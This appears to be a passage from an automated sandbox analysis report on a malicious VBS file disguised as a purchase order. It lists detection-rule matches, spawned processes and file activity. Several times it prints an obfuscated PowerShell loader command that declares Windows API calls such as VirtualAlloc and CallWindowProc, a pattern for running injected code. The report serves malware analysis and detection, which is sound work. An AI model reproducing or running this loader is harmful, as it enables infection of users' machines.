SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelku	Jump to behavior

Potential malicious VBS script found (suspicious strings)

Source:

Initial file: lysreklamerne.ShellExecute Blindtabletter, " " & chrw(34) & ap6 & chrw(34), "", "", 0

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 5576
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 5576			Jump to behavior

Yara signature match

Source: PO-09784893 xlsx.vbs, type: SAMPLE	Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: amsi64_4180.amsi.csv, type: OTHER	Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: powershell.exe PID: 4412, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Java / VBScript file with very long strings (likely obfuscated code)

Source: PO-09784893 xlsx.vbs

Initial sample: Strings found which are bigger than 50

Detected potential crypto function

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_078135D8	3_2_078135D8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_07810040	3_2_07810040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_078135CB	3_2_078135CB

Abnormal high CPU Usage

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process Stats: CPU usage > 98%

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dll	Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-09784893 xlsx.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelku
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.cmdline
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41DE.tmp" "c:\Users\user\AppData\Local\Temp\ksa1shoc\CSC45555F46326F41418DCB1F5062A9163A.TMP"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelku	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.cmdline	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES41DE.tmp" "c:\Users\user\AppData\Local\Temp\ksa1shoc\CSC45555F46326F41418DCB1F5062A9163A.TMP"	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2816:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2860:120:WilError_01

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-09784893 xlsx.vbs"

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_daxdyhsl.wnc.ps1

Jump to behavior

Source: classification engine

Classification label: mal84.expl.evad.winVBS@11/9@0/0

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source:

Binary string: ek8C:\Users\user\AppData\Local\Temp\ksa1shoc\ksa1shoc.pdb source: powershell.exe, 00000003.00000002.848043775.0000000004E2A000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

VBScript performs obfuscated calls to suspicious functions

Source: C:\Windows\System32\wscript.exe

Obfuscated command line found

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelku
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Saudiarabiske = """KoAEldMedPo-CeTphySupLnePh Eg-FrTFoyCepspeGrDTeefafSaiRenSpiPltSeiUfoSlnRa Je'DruBlsLiiMinIngAx AjSmoyTesZatIneNemUg;SpuLesUniSonUngMu TrSPoyelsIntHaeKomTr.SvRKiuHenHatEgiSimKaeSh.MoICanPitOxeterStoFepTeSAreEfrSkvFoishcGaeBesFo;FopKouBabSelStihocLv MasAftTraRutSeiBecad MecVelSaaXysAusBr OsTSehLiwBuaKorHutAbnBeeBesBusUn1Ce Sa{Tr[MaDAnlOmlSpIVemArpSuoSerUttFr(St`"""PeAUnDOoVEdAStPunIFo3Nd2La.cuDGeLruLCi`"""Cl)Bl]BrpasuVibBolIsiudcWa UnsBetSuaImtAfiFucBi HaeSlxTotboeTjrSunKt reiVinSotTu SpGReeAftUdSoveLarUdvCoiVacTieSkKSteSayCiNInaWempreTa(NoiNongrtCo OmNAnoTayMoiCasPllMa,GriApnIntAl AlSSelLagSptSm6Pe9Fo,BiiUrnBetPi KrAIsfFifLiainlPo,maiBenMotTr AsbTeaGagLaaNy)Ma;Sc[SoDChlDelNgIGomMiptioVarkutPa(Sa`"""SkgWhdBoiSe3Vi2Pe`"""Sn)Ka]BepKruRabKllIbiFecSl FosBetAdaArtGriHvcEm DreHaxSatSeeAsrBrnDa AaiafnLotOv BeGNaeSotHjCamlRgiBupSaRmagConRe(SkiBanRatHe KoMEkuTalLa,StiaunCetEt TrGMagpyeUngAnuFi)Wo;Ub[UbDCalExlStIRomCipReoCarDytTr(Se`"""cakDieSarSenPleMalbi3Tr2si`"""Tr)Be]JopBruYabSolAuiLacDi DisLjtSkaEmtTuiOvcBe AterexSttDreAtrFonWe FlIUnnpatTaPsttVerAr SaEpinLsuMemUnSHayAbsDotaseTumSpLDroAdcVoaSllSteDksBaWSa(RauSviOpnAltko MevPe1du,MoiUnnHeter PlvSn2Ta)Du;He[CaDFolGylRaIEcmArpAnoBrrQutFe(Li`"""SykBaeskravnKaeMilSk3Mo2de`"""Di)Fa]PrpCouBebAnlAfiHycUn AlsHjtHyaDrtMiiUncPi CeeStxKytKaeAlrKonac ariBlnCatse HuGSilPsoSebEfaPllEmDMaeSalHeeSatBreprASmtGuoFimUn(PuiAenFotDr TePTrrtleDe1To5Sa1Co)Sk;ha[BaDEvlEulTrIDemHopSaoFarNotTr(Ca`"""AkgPidPliFi3Sc2Re`"""Aa)Da]SapEkuApbTalReiHacPr NosoptSraSktStiSqcAk EneAaxSptFoeTarDenSp AriSenOvtBe FlSFotEnrunoAekSheBoABlnTadPaFGeiSolAnlblPOsaAvtunhPr(DiiDdnArtKl AcEKrtLuhWiyUnlHj8Bl7Du)Bi;Qu[NoDKrlUnlEkIApmEmpSyoinrGltCy(Sa`"""seuMosPeeafrPa3Bl2In`"""Ko)Un]JrpdiuRebSklNoiSncSc SpsFutstaSetFaiklcMe UeeDexUdtCoeUnrJanSt iniNonFltRh GrCInlSkoInsBiePyCDalSuiMopEtbEnoTaaTarBedPa(Ku)Un;Yn[ChDAglLrlOtICamCopSaoGhrmatBa(Sp`"""PawTriArnResGapDeoAnoSplTi.BrdExrObvSp`"""Un)Dr]OppHeuInbUnlCeiCocSt UnsSetCeaFotDiistcMe StePaxwatlaeBrrRenOv PaiStnCotRu PlSEncLuhTeeNodTrutalDaedrJMaoPrbTr(BeitynOltkl KnUFanAfoKovCoeStrEl2Br2Kl6Re,IniNonRetKo PiaMikWetStiWa)Mu;Dd[AfDUnlSllspIVomRepNooTrrChtOl(Cy`"""GeAAnDPrVEgALiPSeIFo3Sp2Re.RyDOvLAjLRe`"""Do)St]TypNauRabMelPoilocBu PlsFitMiapatSciPecTa DieStxBotDreHurmenAl MliFanBltCi TrQMouFaeErrAryVoSHaeKorKrvTsiLecKueFaCudoAfnPrfliiSugHe(MuiFonpitHo prRTheEngoflEseatrFi,LiiInnGrtFu opCEnogasAc0Ti,BaiMinSttSh GrDDriSpsDepreoOvsSu,CoiRinTatIn NoNPeaRupUnhLeoEr2Ho7No)Mo;Un[InDHalaflUvIAfmCoppaosprUntTo(Co`"""IrwaliSknMisOvpPeoNooAalRe.SldMorKlvFo`"""St)Se]CopFouCrbBilOpiSkcSk KasOvtBlaantFriOmcMa UneSuxEntTreLyrDenBe VeiFonRitCa haDCioUncGruRemDreMunWetSePFirSloLipPaeVkrPutIniTeeEnsVe(BoiAanLitWo WiFUvoTarBesat,FoiVenNitsa GrLSuaNonUsgSorBeeSi,FoiYunMitOu StSObkRerHeisevTv,FriGanTetTo BuhGheKamEx,waiAlnAntAn MeSSeaRhmErbDuaGrfTu,SeiSlnuntEx MoRReesitSpiau)Fr;Dr[WhDamlRelku			Jump to behavior

Compiles C# or VB.Net code

